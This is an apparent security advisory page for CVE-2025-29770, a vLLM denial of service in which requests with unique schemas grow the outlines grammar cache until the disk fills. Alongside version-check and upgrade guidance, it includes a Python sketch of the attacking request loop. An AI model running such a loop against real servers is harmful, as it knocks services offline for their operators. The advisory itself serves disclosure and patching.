CVE-2025-29770

GHSA-mgrm-fgjv-mhv8 MEDIUM
Published March 19, 2025

vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. The outlines library, one of the backends vLLM uses for structured output (a.k.a. guided decoding), keeps an on-disk cache of compiled grammars that has been enabled by default in vLLM. By sending a stream of very short requests with unique schemas, an authenticated user can grow this cache without bound and exhaust the filesystem, causing a denial of service. The issue affects only the V0 engine and is fixed in vLLM 0.8.0; the full NVD description appears under Technical Details.

Affected Systems

Package   Ecosystem   Vulnerable Range   Patched
vllm      pip         < 0.8.0            0.8.0
vllm      pip         (not listed)       No patch
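
To confirm exposure, compare the installed version against the patched release. A minimal sketch in Python, assuming a standard pip-managed environment and a plain X.Y.Z version string:

    # Minimal version check (assumes a plain "X.Y.Z" release string).
    from importlib.metadata import PackageNotFoundError, version

    try:
        installed = version("vllm")
    except PackageNotFoundError:
        raise SystemExit("vllm is not installed")

    # CVE-2025-29770 is fixed in 0.8.0, so anything older is affected.
    vulnerable = tuple(int(p) for p in installed.split(".")[:3]) < (0, 8, 0)
    print(f"vllm {installed}: {'vulnerable' if vulnerable else 'patched'}")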

Severity & Risk

CVSS 3.1
6.5 / 10
EPSS
0.3%
probability of exploitation within the next 30 days
KEV Status
Not in KEV
Sophistication
N/A

Recommended Action

Patch available

Update vllm to version 0.8.0 or later.
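
If the package is managed with pip, as the ecosystem column above indicates, the upgrade is a single command:

    pip install --upgrade "vllm>=0.8.0"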

Technical Details

NVD Description

vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. The outlines library is one of the backends used by vLLM to support structured output (a.k.a. guided decoding). Outlines provides an optional cache for its compiled grammars on the local filesystem. This cache has been on by default in vLLM. Outlines is also available by default through the OpenAI compatible API server.

The affected code in vLLM is vllm/model_executor/guided_decoding/outlines_logits_processors.py, which unconditionally uses the cache from outlines. A malicious user can send a stream of very short decoding requests with unique schemas, resulting in an addition to the cache for each request. This can result in a Denial of Service if the filesystem runs out of space.

Note that even if vLLM was configured to use a different backend by default, it is still possible to choose outlines on a per-request basis using the guided_decoding_backend key of the extra_body field of the request. This issue applies only to the V0 engine and is fixed in 0.8.0.
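
The request pattern the description refers to is easy to picture. The sketch below is illustrative only, not a working exploit: it assumes a local vLLM OpenAI-compatible server, a placeholder model name, and vLLM's guided_json structured-output parameter alongside the guided_decoding_backend key named in the advisory.

    # Illustrative only: each request carries a never-before-seen JSON schema,
    # so the outlines backend compiles and caches a new grammar on disk every
    # time. Endpoint, API key, and model name below are placeholders.
    from openai import OpenAI

    client = OpenAI(base_url="http://localhost:8000/v1", api_key="EMPTY")

    for i in range(10):  # a real attack would loop far longer
        schema = {
            "type": "object",
            # Unique property name per request => unique compiled grammar.
            "properties": {f"field_{i}": {"type": "string"}},
        }
        client.chat.completions.create(
            model="placeholder-model",
            messages=[{"role": "user", "content": "hi"}],
            max_tokens=1,  # keep each request very short, as described
            extra_body={
                "guided_json": schema,                  # assumed vLLM parameter
                "guided_decoding_backend": "outlines",  # key named in advisory
            },
        )

Because the backend can be selected per request, configuring a different default backend on the server does not close this path; only upgrading to 0.8.0 does.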

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
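
Decoded, the vector matches the report: network attack vector (AV:N), low attack complexity (AC:L), low privileges required (PR:L), no user interaction (UI:N), unchanged scope (S:U), and no confidentiality or integrity impact (C:N, I:N) but high availability impact (A:H), i.e. a pure denial of service.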

Timeline

Published
March 19, 2025
Last Modified
July 31, 2025
First Seen
March 19, 2025